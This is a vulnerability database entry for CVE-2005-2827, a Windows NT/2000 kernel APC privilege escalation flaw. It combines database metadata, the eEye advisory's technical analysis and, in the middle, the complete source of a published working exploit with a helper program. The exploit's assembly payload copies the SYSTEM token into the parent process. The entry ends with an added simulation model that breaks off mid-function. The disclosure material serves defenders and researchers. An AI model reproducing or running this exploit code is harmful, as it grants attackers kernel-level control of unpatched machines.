CVE-2005-2827
CVSS 7.2
Published: 2005-12-13 20:03:00
Revised: 2011-03-07 21:25:05

[Original] The thread termination routine in the kernel for Windows NT 4.0 and 2000 (NTOSKRNL.EXE) allows local users to modify kernel memory and execution flow via steps in which a terminating thread causes Asynchronous Procedure Call (APC) entries to free the wrong data, aka the "Windows Kernel Vulnerability."


[CNNVD] Microsoft Windows Asynchronous Procedure Call Local Privilege Escalation Vulnerability (CNNVD-200512-225)

        Microsoft Windows is a very popular operating system published by Microsoft.
        Microsoft Windows has a vulnerability in the way it handles Asynchronous Procedure Call (APC) queue lists. A local attacker can exploit it to supply an arbitrary function pointer, hijack the flow of execution, and ultimately take complete control of the system. When a thread exits, PspExitThread detaches the thread's APC queues from ETHREAD.ApcState.ApcListHead[0] and ApcListHead[1], so that each queue becomes a circular, doubly-linked list whose first and last nodes do not point back to the list head (a LIST_ENTRY structure). However, since the list heads' pointers are not modified, the purpose is presumably only to let the APC freeing loop in PspExitThread walk each list and free its nodes without navigating back to the list head and erroneously attempting to free memory inside the ETHREAD structure. An attacker can turn this process into a "data free" that eventually causes ExFreePoolWithTag to operate on user memory.
        APCs queued by an external process count against that process's pool quota, so the quota block of the pool block containing the APC structure holds a reference to the queuing process. If the exiting thread's lists contain an APC queued by a now-terminated external process, and that APC node represents the last reference to the process's Process object, then freeing that node destroys the Process object from within ExFreePoolWithTag; the consequences include executing PspProcessDelete. This switches to the ending process's address space with KeStackAttachProcess and calls PspExitProcess, then reverses the switch with KeUnstackDetachProcess.
        Both the "attach" and "detach" functions call KiMoveApcState, which is intended to temporarily strip the thread of its APCs so that none are dispatched in an address space for which they were not intended, and then re-link the APC lists once the thread's original address space is reinstated. During attach, the ETHREAD.ApcState structure is copied and the pointers of the lists' first and last nodes are adjusted to refer to the copy. On detach, even though the first and last nodes' pointers were supposed to remain disconnected (because the APC freeing loop is still in progress), those node pointers are adjusted to re-link the lists to the original ETHREAD.ApcState. The end result is that the freeing loop continues and attempts to free part of the ETHREAD structure. Because the accessed portion of ETHREAD contains predictable and mostly zeroed values, this ultimately leads the kernel to operate on attacker-supplied pointers.
        The following illustrates the sequence of function calls and parameters involved in producing the vulnerable condition:
        . PspExitThread
        . . KeFlushQueueApc
        . . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
        . . (APC free loop begins)
        . . ExFreePool(1st_APC -- queued by exited_process)
        . . . ExFreePoolWithTag(1st_APC)
        . . . . ObfDereferenceObject(exited_process)
        . . . . . ObpRemoveObjectRoutine
        . . . . . . PspProcessDelete
        . . . . . . . KeStackAttachProcess(exited_process)
        . . . . . . . . KiAttachProcess
        . . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
        . . . . . . . . . KiSwapProcess
        . . . . . . . PspExitProcess(0)
        . . . . . . . KeUnstackDetachProcess
        . . . . . . . . KiMoveApcState(duplicate --> ETHREAD.ApcState)
        . . . . . . . . KiSwapProcess
        . . ExFreePool(2nd_APC)
        . . ExFreePool(ETHREAD + 30h)
        . . (APC free loop ends)

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  Microsoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp3:professional  Microsoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:datacenter_server  Microsoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp3:advanced_server  Microsoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  Microsoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000::sp4:datacenter_server  Microsoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp3:server  Microsoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp4:server  Microsoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_nt:4.0  Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_2000::sp4:professional  Microsoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_2000::sp4:advanced_server  Microsoft Windows 2000 Advanced Server SP4

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1583  Win2K Kernel Privilege Escalation Vulnerability
*OVAL describes the method for detecting this vulnerability in detail; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2827
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2827
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-225
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/15826
(PATCH)  BID  15826
http://www.microsoft.com/technet/security/bulletin/ms05-055.mspx
(VENDOR_ADVISORY)  MS  MS05-055
http://secunia.com/advisories/15821
(VENDOR_ADVISORY)  SECUNIA  15821
http://xforce.iss.net/xforce/xfdb/23447
(UNKNOWN)  XF  win-apc-gain-privileges(23447)
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
http://www.vupen.com/english/advisories/2005/2909
(UNKNOWN)  VUPEN  ADV-2005-2909
http://www.vupen.com/english/advisories/2005/2868
(UNKNOWN)  VUPEN  ADV-2005-2868
http://www.securityfocus.com/archive/1/archive/1/419377/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051213 [EEYEB-20050523] Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability
http://www.osvdb.org/18823
(UNKNOWN)  OSVDB  18823
http://www.eeye.com/html/research/advisories/AD20051213.html
(UNKNOWN)  EEYE  EEYEB-20051213
http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
http://securitytracker.com/id?1015347
(UNKNOWN)  SECTRACK  1015347
http://secunia.com/advisories/18311
(UNKNOWN)  SECUNIA  18311
http://secunia.com/advisories/18064
(UNKNOWN)  SECUNIA  18064
http://securityreason.com/securityalert/252
(UNKNOWN)  SREASON  252

- Vulnerability information

Microsoft Windows Asynchronous Procedure Call Local Privilege Escalation Vulnerability
High risk  Design error
2005-12-13 00:00:00 2007-04-10 00:00:00
Local

- Advisory and patch

        The vendor has released an update that fixes this security issue; it can be obtained from:
        http://www.microsoft.com/technet/security/bulletin/ms05-055.mspx
        http://www.microsoft.com/downloads/details.aspx?FamilyId=3832FF23-6B04-4CA2-80B9-D344B4CC98EA

- Vulnerability information (1407)

MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055) (EDBID:1407)
windows local
2006-01-05 Verified
0 SoBeIt
N/A
/* helper.c commented out below ms05-055.c /str0ke */

/*
	MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
			Created by SoBeIt
					12.25.2005

	Main file of exploit

	Tested on:

	Windows 2000 PRO SP4 Chinese
	Windows 2000 PRO SP4 Rollup 1 Chinese
	Windows 2000 PRO SP4 English
	Windows 2000 PRO SP4 Rollup 1 English

	Usage:ms05-055.exe helper.exe
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>


#define NTSTATUS	ULONG
#define ProcessBasicInformation	0

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _PROCESS_BASIC_INFORMATION {
      NTSTATUS ExitStatus;
      PVOID PebBaseAddress;
      ULONG AffinityMask;
      ULONG BasePriority;
      ULONG UniqueProcessId;
      ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

typedef struct _EPROCESS_QUOTA_BLOCK {
    ULONG QuotaLock;
    ULONG ReferenceCount;
    ULONG QuotaPeakPoolUsage[2];
    ULONG QuotaPoolUsage[2];
    ULONG QuotaPoolLimit[2];
    ULONG PeakPagefileUsage;
    ULONG PagefileUsage;
    ULONG PagefileLimit;
} EPROCESS_QUOTA_BLOCK, *PEPROCESS_QUOTA_BLOCK;

typedef struct _OBJECT_TYPE_INITIALIZER {
    USHORT Length;
    BOOLEAN UseDefaultObject;
    BOOLEAN Reserved;
    ULONG InvalidAttributes;
    UCHAR GenericMapping[0x10];
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    BOOLEAN MaintainTypeList;
    USHORT PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
    PVOID DumpProcedure;
    PVOID OpenProcedure;
    PVOID CloseProcedure;
    PVOID DeleteProcedure;
    PVOID ParseProcedure;
    PVOID SecurityProcedure;
    PVOID QueryNameProcedure;
    PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;

typedef struct _OBJECT_TYPE {
    UCHAR Mutex[0x38];
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    ULONG Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER TypeInfo;
} OBJECT_TYPE, *POBJECT_TYPE;

typedef struct _OBJECT_HEADER {
    ULONG PointerCount;
    ULONG HandleCount;
    POBJECT_TYPE Type;
    UCHAR NameInfoOffset;
    UCHAR HandleInfoOffset;
    UCHAR QuotaInfoOffset;
    UCHAR Flags;
    PVOID QuotaBlockCharged;
    PVOID SecurityDescriptor;
} OBJECT_HEADER, *POBJECT_HEADER;

__declspec(naked)
NTSTATUS
NTAPI
ZwQueueApcThread(
	HANDLE hThread,
	PKNORMAL_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PVOID Argument1,
	PVOID Argument2)
{
	__asm
	{
		mov eax, 0x9e
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

__declspec(naked)
NTSTATUS
ZwAlertThread(
	HANDLE hThread)
{
	__asm
	{
		mov eax, 0x0c
		lea edx, [esp+4]
		int 0x2e
		ret 0x4
	}
}

__declspec(naked)
NTSTATUS
NTAPI
ZwQueryInformationProcess(
	HANDLE ProcessHandle,
	ULONG InformationClass,
	PVOID ProcessInformation,
	ULONG ProcessInformationLength,
	PULONG ReturnLength)
{
	__asm
	{
		mov eax, 0x86
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

HANDLE	hTargetThread;
ULONG	ParentProcessId;

VOID NTAPI APCProc(PVOID pApcContext, PVOID Argument1, PVOID Argument2)
{
    printf("%s\n", pApcContext);

	return;
}

VOID ErrorQuit(char *msg)
{
	printf(msg);
	ExitProcess(0);
}

ULONG WINAPI TestThread(PVOID pParam)
{
	CONTEXT	Context;
	ULONG	i = 0;
	HANDLE	hThread, hEvent = (HANDLE)pParam;
	int	PoolIndex, PoolType;

	for(;;)
	{
		if((hThread = CreateThread(NULL, 0, TestThread, pParam, CREATE_SUSPENDED, NULL)) == NULL)
			ErrorQuit("Create thread failed.\n");

		Context.ContextFlags = CONTEXT_INTEGER;
		if(!GetThreadContext(GetCurrentThread(), &Context))
			ErrorQuit("Child thread get context failed.\n");

		printf("Child ESP:%x\n", Context.Esp);
		PoolType = (Context.Esp >> 16) & 0xff;
		PoolIndex = ((Context.Esp >> 8) & 0xff) - 1;
		printf("PoolIndex:%2x PoolType:%2x\n", PoolIndex, PoolType);
		if((PoolIndex & 0x80) && (PoolType & 0x8) && (PoolType & 0x3) && !(PoolType & 0x20) && !(PoolType & 0x40))
		{
			printf("Perfect ESP:%x\n", Context.Esp);
			break;
		}

		Sleep(500);
		ResumeThread(hThread);
		CloseHandle(hThread);
		SuspendThread(GetCurrentThread());
	}

	DuplicateHandle(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &hTargetThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
	SetEvent(hEvent);
	SuspendThread(hTargetThread);
	ZwQueueApcThread(hTargetThread, APCProc, NULL, NULL, NULL);
	printf("In child thread. Now terminating to trigger the bug.\n");
	ExitThread(0);

	return 1;
}

__declspec(naked) ExploitFunc()
{
	__asm
	{
//		int	0x3
		mov esi, 0xffdff124
		mov esi, dword ptr [esi]
		mov eax, dword ptr [esi+0x44]

		mov ecx, 0x8
		call FindProcess
		mov edx, eax

		mov ecx, ParentProcessId
		call FindProcess

		mov ecx, dword ptr [edx+0x12c]
		mov dword ptr [eax+0x12c], ecx
		xor ebx, ebx
		xor edi, edi
		mov dword ptr [ebp+0xf0], edi
		add esp, 0x74
		add ebp, 0x10c
		ret

FindProcess:
	    mov eax, dword ptr [eax+0xa0]
		sub eax, 0xa0
		cmp dword ptr [eax+0x9c], ecx
		jne FindProcess
		ret
	}
}

int main(int argc, char *argv[])
{
	HANDLE	hThread, hEvent, hProcess;
	PEPROCESS_QUOTA_BLOCK	pEprocessQuotaBlock;
	POBJECT_HEADER	pObjectHeader;
	POBJECT_TYPE	pObjectType;
	ULONG	i = 0, ProcessId;
	STARTUPINFO si;
    PROCESS_INFORMATION pi;
	PROCESS_BASIC_INFORMATION pbi;
	char Buf[64], *pParam;
	PULONG	pKernelData;

	printf("\n MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit \n\n");
	printf("\t Create by SoBeIt. \n\n");
	if(argc != 2)
	{
		printf(" Usage:ms05-055.exe helper.exe. \n\n");
		return 1;
	}

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
	
	if((pKernelData = VirtualAlloc((PVOID)0x1000000, 0x1000, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		ErrorQuit("Allocate pKernelData failed.\n");

	if((pEprocessQuotaBlock = VirtualAlloc(NULL, sizeof(EPROCESS_QUOTA_BLOCK), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)) == NULL)
		ErrorQuit("Allocate pEprocessQuotaBlock failed.\n");

	if((pObjectHeader = VirtualAlloc(NULL, sizeof(OBJECT_HEADER), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)) == NULL)
		ErrorQuit("Allocate pObjectHeader failed\n");

	if((pObjectType = VirtualAlloc(NULL, sizeof(OBJECT_TYPE), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)) == NULL)
		ErrorQuit("Allocate pObjectType failed.\n");

	ZeroMemory((PVOID)0x1000000, 0x1000);
	ZeroMemory(pEprocessQuotaBlock, sizeof(EPROCESS_QUOTA_BLOCK));
	ZeroMemory(pObjectHeader, sizeof(OBJECT_HEADER));
	ZeroMemory(pObjectType, sizeof(OBJECT_TYPE));

	pKernelData[0xee] = (ULONG)pEprocessQuotaBlock;		//0xae = (0x1b8+0x200) / 4
	pEprocessQuotaBlock->ReferenceCount = 0x221;
	pEprocessQuotaBlock->QuotaPeakPoolUsage[0] = 0x1f4e4;
	pEprocessQuotaBlock->QuotaPeakPoolUsage[1] = 0x78134;
	pEprocessQuotaBlock->QuotaPoolUsage[0] = 0x1e5e8;
	pEprocessQuotaBlock->QuotaPoolUsage[1] = 0x73f64;
	pEprocessQuotaBlock->QuotaPoolLimit[0] = 0x20000;
	pEprocessQuotaBlock->QuotaPoolLimit[1] = 0x80000;
	pEprocessQuotaBlock->PeakPagefileUsage = 0x5e9;
	pEprocessQuotaBlock->PagefileUsage = 0x5bb;
	pEprocessQuotaBlock->PagefileLimit = 0xffffffff;

	pObjectHeader = (POBJECT_HEADER)(0x1000200-0x18);
	pObjectHeader->PointerCount = 1;
	pObjectHeader->Type = pObjectType;

	pObjectType->TypeInfo.DeleteProcedure = ExploitFunc;

	hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
	DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), 
			&hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS);

	if((hThread = CreateThread(NULL, 0, TestThread, (PVOID)hEvent, CREATE_SUSPENDED, NULL)) == NULL)
		ErrorQuit("Create thread failed.\n");
	
	ResumeThread(hThread);
	WaitForSingleObject(hEvent, INFINITE);
	printf("The sleep has awaken.\n");
	ProcessId = GetCurrentProcessId();
	printf("Target thread handle:%x, Target process handle:%x, Process id:%x\n", hTargetThread, hProcess, ProcessId);
	pParam = Buf;
	strcpy(Buf, argv[1]);
	pParam += sizeof(argv[1]);
	pParam = strchr(Buf, '\0');
	*pParam++ = ' ';
	itoa((int)hTargetThread, pParam, 10);
	pParam = strchr(Buf, '\0');
	*pParam++ = ' ';
	itoa(ProcessId, pParam, 10);
	printf("%s\n", Buf);
	if(!CreateProcess(NULL, Buf, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi ))
		ErrorQuit("Create process failed,\n");

	CloseHandle(pi.hThread);
	CloseHandle(hEvent);
	printf("Now waitting for triggering the bug.\n");
	WaitForSingleObject(pi.hProcess, INFINITE);
	if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
		ErrorQuit("Query parent process failed\n");

	ParentProcessId = pbi.InheritedFromUniqueProcessId;
	printf("Parent process id:%x\n", ParentProcessId);
	
	CloseHandle(pi.hProcess);
	ResumeThread(hTargetThread);
	WaitForSingleObject(hTargetThread, INFINITE);
	printf("Exploit finished.\n");

	return 1;
}


/*
	MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
			Created by SoBeIt
					12.25.2005

	Helper file of exploit

	Tested on:

	Windows 2000 PRO SP4 Chinese
	Windows 2000 PRO SP4 Rollup 1 Chinese
	Windows 2000 PRO SP4 English
	Windows 2000 PRO SP4 Rollup 1 English

	Usage:ms05-055.exe helper.exe


#include <stdio.h>
#include <windows.h>

#define NTSTATUS	ULONG

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);

__declspec(naked)
NTSTATUS
NTAPI
ZwQueueApcThread(
	HANDLE hThread,
	PKNORMAL_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PVOID Argument1,
	PVOID Argument2)
{
	__asm
	{
		mov eax, 0x9e
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

__declspec(naked)
NTSTATUS
ZwAlertThread(
	HANDLE hThread)
{
	__asm
	{
		mov eax, 0x0c
		lea edx, [esp+4]
		int 0x2e
		ret 0x4
	}
}

VOID NTAPI ApcProc(PVOID ApcContext, PVOID Argument1, PVOID Argument2)
{
}

int main(int argc, char *argv[])
{
	HANDLE	hTargetThread, hTargetProcess, hThread;
	int		ProcessId;
	PVOID	pApcProc;

	if(argc != 3)
	{
		printf(" Usage:ms05-055.exe helper.exe. \n");
		return 1;
	}

	hTargetThread = (HANDLE)atoi(argv[1]);
	ProcessId = atoi(argv[2]);
	printf("Got thread handle:%x, Got process id:%x\n", hTargetThread, ProcessId);
	hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
	printf("Process handle:%x\n", hTargetProcess);
	if(!DuplicateHandle(hTargetProcess, hTargetThread, GetCurrentProcess(),  &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS))
		printf("Duplicate handle failed.\n");

	if((pApcProc = VirtualAllocEx(hTargetProcess, 0, 1024*4, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		printf("Allocate remote memory failed.\n");

	if(!WriteProcessMemory(hTargetProcess, pApcProc, &ApcProc, 1024*4, 0))
		printf("Write remote memory failed.\n");

	ZwAlertThread(hThread);
	ZwQueueApcThread(hThread, (PKNORMAL_ROUTINE)pApcProc, NULL, NULL, NULL);
	CloseHandle(hTargetProcess);
	CloseHandle(hThread);
	printf("Now terminating process.\n");
	ExitProcess(0);
}

*/

// milw0rm.com [2006-01-05]
		

- Vulnerability information (F42288)

EEYEB-20050523.txt (PacketStormID:F42288)
2005-12-14 00:00:00
Derek Soeder  eeye.com
advisory,kernel,local
windows,2k,nt
CVE-2005-2827

eEye Security Advisory - eEye Digital Security has discovered a local privilege escalation vulnerability in the Windows kernel that could allow any code executing on a Windows NT 4.0 or Windows 2000 system to elevate itself to the highest possible local privilege level (kernel).

Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability

Release Date:
December 13, 2005

Date Reported:
May 23, 2005

External References:
eEye ID# EEYEB-20050523
OSVDB ID# 18823
CVE # CAN-2005-2827
Microsoft #  MS05-055

Severity:
Medium (Local Privilege Escalation to Kernel)

Systems Affected:
Windows NT 4.0
Windows 2000

Overview:
eEye Digital Security has discovered a local privilege escalation
vulnerability in the Windows kernel that could allow any code executing
on a Windows NT 4.0 or Windows 2000 system to elevate itself to the
highest possible local privilege level (kernel).  For example, a
malicious user, network worm, or e-mail virus could take advantage of
this vulnerability in order to completely compromise the vulnerable
system on which the exploit code is executing, regardless of that code's
original privilege level.

The vulnerability exists in the thread termination routine contained
within NTOSKRNL.EXE.  Through a specific series of steps, a local
attacker can cause the code responsible for discarding queued
Asynchronous Procedure Call (APC) entries to erroneously attempt to free
a region of kernel data, producing a "data free" vulnerability that may
be exploited in order to alter arbitrary kernel memory, or even divert
the flow of execution directly.

Technical Details:
The basis of this vulnerability is in PspExitThread's APC freeing loop
and in the behavior of KiMoveApcState, invoked from KiAttachProcess and
KeUnstackDetachProcess.  We'll give a description of the problem below,
followed by a "call flow" illustration to outline the specific sequence
of events.

When a thread is exiting, PspExitThread will detach the thread's APC
queues from ETHREAD.ApcState.ApcListHead[0] and ApcListHead[1], so that
each queue is now a circular, doubly-linked list in which the first and
last nodes do not point back to the list head (LIST_ENTRY structure).
However, since the list heads' pointers are not modified, the purpose is
presumably just to allow the APC freeing loop within PspExitThread to
walk each list and free its nodes, without navigating back to the list
head and erroneously attempting to free memory within the ETHREAD
structure.  Of course, the vulnerability is that this can be made to
happen, and the result is a "data free" condition that eventually causes
ExFreePoolWithTag to operate on user memory.

APCs queued by an external process count against that process's pool
quota, and therefore the quota block of the pool block containing the
APC structure has a reference to the queuing process.  If the exiting
thread contains an APC queued by a now-terminated external process in
its lists, and if that APC node represents the last reference to the
process's Process object, then freeing that node will cause the Process
object to be destroyed from within ExFreePoolWithTag.  Part of this
sequence involves executing PspProcessDelete, which switches to the
ending process's address space using KeStackAttachProcess, calls
PspExitProcess, and then reverses the switch with
KeUnstackDetachProcess.

Both the "attach" and "detach" functions call KiMoveApcState, which is
intended to temporarily strip the thread of its APCs so that none are
dispatched in an address space for which they were not intended, then
re-link the list of APCs after the thread's native address space is
reinstated.  During attach, the ETHREAD.ApcState structure is
duplicated, and the pointers of the lists' first and last nodes are
adjusted to refer to the copy.  Upon detach, the first and last nodes'
pointers are adjusted to re-link the lists to the original
ETHREAD.ApcState -- even though they were supposed to remain
disconnected, since the APC free loop is still in progress.  The end
result is that the free loop will continue and attempt to free a portion
of the ETHREAD structure as though it were a pool block header,
culminating in the kernel operating on attacker-supplied pointers from
user-land memory, because the accessed portion of ETHREAD contains
predictable and mostly zeroed values.

The following depicts the sequence of function calls and parameters
involved in producing the vulnerable condition:

. PspExitThread
. . KeFlushQueueApc
. . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
. . (APC free loop begins)
. . ExFreePool(1st_APC -- queued by exited_process)
. . . ExFreePoolWithTag(1st_APC)
. . . . ObfDereferenceObject(exited_process)
. . . . . ObpRemoveObjectRoutine
. . . . . . PspProcessDelete
. . . . . . . KeStackAttachProcess(exited_process)
. . . . . . . . KiAttachProcess
. . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
. . . . . . . . . KiSwapProcess
. . . . . . . PspExitProcess(0)
. . . . . . . KeUnstackDetachProcess
. . . . . . . . KiMoveApcState(duplicate --> ETHREAD.ApcState)
. . . . . . . . KiSwapProcess
. . ExFreePool(2nd_APC)
. . ExFreePool(ETHREAD + 30h)
. . (APC free loop ends)

The ETHREAD data upon which ExFreePool is called is mostly predictable,
KernelStack at offset +28h being the single true variable; however,
methods for leaking a thread's kernel ESP permit complete control over
the path execution will take through ExFreePoolWithTag.  With enough
crafting, an arbitrary function pointer can be supplied as an object
type method, allowing execution to be hijacked directly.

Beginning with Windows XP, KeFlushQueueApc contains a code fix that
resolves this vulnerability.
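The interaction above (detach without clearing the head, KiMoveApcState re-linking the first and last nodes mid-loop, the loop walking into ETHREAD) can be reproduced in user mode. The following C program is an added model written for this page; it is not from the advisory, the exploit, or any Microsoft code. Every sim_* name is a stand-in, frees are only recorded, and the "hardened" flush is an assumed mitigation, not a description of the Windows XP KeFlushQueueApc fix.

```c
/* Added model (not from the advisory, the exploit, or any Microsoft code) of the
 * APC free loop meeting KiMoveApcState; every sim_* name is a stand-in. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct sim_list_entry { struct sim_list_entry *Flink, *Blink; } sim_list_entry;
typedef struct { sim_list_entry ApcListHead[2]; } sim_apc_state;
/* Header padding keeps the list head at a non-zero offset, like ETHREAD+30h above. */
typedef struct { uint8_t Header[0x30]; sim_apc_state ApcState, SavedApcState; } sim_ethread;
typedef struct { int PointerCount; } sim_process;                 /* queuing process */
typedef struct { sim_list_entry ApcListEntry; sim_process *Quota; } sim_apc;
typedef struct { const void *freed[8]; int count; int data_free; } sim_free_log;

static sim_ethread sim_thread;
static sim_free_log sim_log;   /* frees are recorded, not performed */

static void sim_init_head(sim_list_entry *h) { h->Flink = h->Blink = h; }
static int sim_inside_ethread(const void *p) {
    const char *c = p, *b = (const char *)&sim_thread;
    return c >= b && c < b + sizeof sim_thread;
}

/* KiMoveApcState stand-in: copy the state; a non-empty list gets its first and
 * last nodes re-pointed at the destination head, an empty one is reset. */
static void sim_move_apc_state(sim_apc_state *src, sim_apc_state *dst) {
    int i;
    *dst = *src;
    for (i = 0; i < 2; i++) {
        sim_list_entry *h = &src->ApcListHead[i];
        if (h->Flink == h) { sim_init_head(&dst->ApcListHead[i]); continue; }
        h->Flink->Blink = &dst->ApcListHead[i];   /* lands in a node already "freed" */
        h->Blink->Flink = &dst->ApcListHead[i];
    }
}

/* PspProcessDelete stand-in: attach (state moved aside), exit, detach (moved back). */
static void sim_process_delete(void) {
    sim_move_apc_state(&sim_thread.ApcState, &sim_thread.SavedApcState);
    sim_init_head(&sim_thread.ApcState.ApcListHead[0]);
    sim_init_head(&sim_thread.ApcState.ApcListHead[1]);
    sim_move_apc_state(&sim_thread.SavedApcState, &sim_thread.ApcState);
}

/* ExFreePool stand-in: releasing the last reference held through the APC's
 * quota charge tears the queuing process down while the loop is still running. */
static void sim_free_pool(sim_list_entry *e) {
    sim_apc *apc = (sim_apc *)e;
    sim_log.freed[sim_log.count++] = e;
    if (sim_inside_ethread(e)) { sim_log.data_free = 1; return; }  /* ETHREAD "freed" */
    if (apc->Quota && --apc->Quota->PointerCount == 0) sim_process_delete();
}

/* Flush as the advisory describes it: first and last nodes are joined to each
 * other, but the ETHREAD head keeps pointing at them. */
static sim_list_entry *sim_flush_vulnerable(sim_list_entry *head) {
    sim_list_entry *first = head->Flink, *last = head->Blink;
    first->Blink = last; last->Flink = first;
    return first;
}

/* One possible hardening (assumed here, not a description of the XP fix): move
 * the nodes under a private head and empty the ETHREAD head, so attach/detach
 * finds nothing to re-link and the loop can never walk into ETHREAD. */
static sim_list_entry *sim_flush_hardened(sim_list_entry *head, sim_list_entry *priv) {
    sim_list_entry *first = head->Flink, *last = head->Blink;
    priv->Flink = first; priv->Blink = last;
    first->Blink = priv; last->Flink = priv;
    sim_init_head(head);
    return first;
}

/* Builds head <-> apc1 <-> apc2, apc1's quota charge being the exited process's
 * last reference, then runs PspExitThread's free loop. Returns the free count. */
int sim_run(int hardened) {
    static sim_apc apc1, apc2;
    static sim_process exited;
    sim_list_entry priv, *head = &sim_thread.ApcState.ApcListHead[0], *first, *stop, *e;
    memset(&sim_thread, 0, sizeof sim_thread);
    memset(&sim_log, 0, sizeof sim_log);
    exited.PointerCount = 1;
    apc1.Quota = &exited; apc2.Quota = NULL;
    head->Flink = &apc1.ApcListEntry; head->Blink = &apc2.ApcListEntry;
    apc1.ApcListEntry.Blink = head; apc1.ApcListEntry.Flink = &apc2.ApcListEntry;
    apc2.ApcListEntry.Blink = &apc1.ApcListEntry; apc2.ApcListEntry.Flink = head;
    sim_init_head(&sim_thread.ApcState.ApcListHead[1]);
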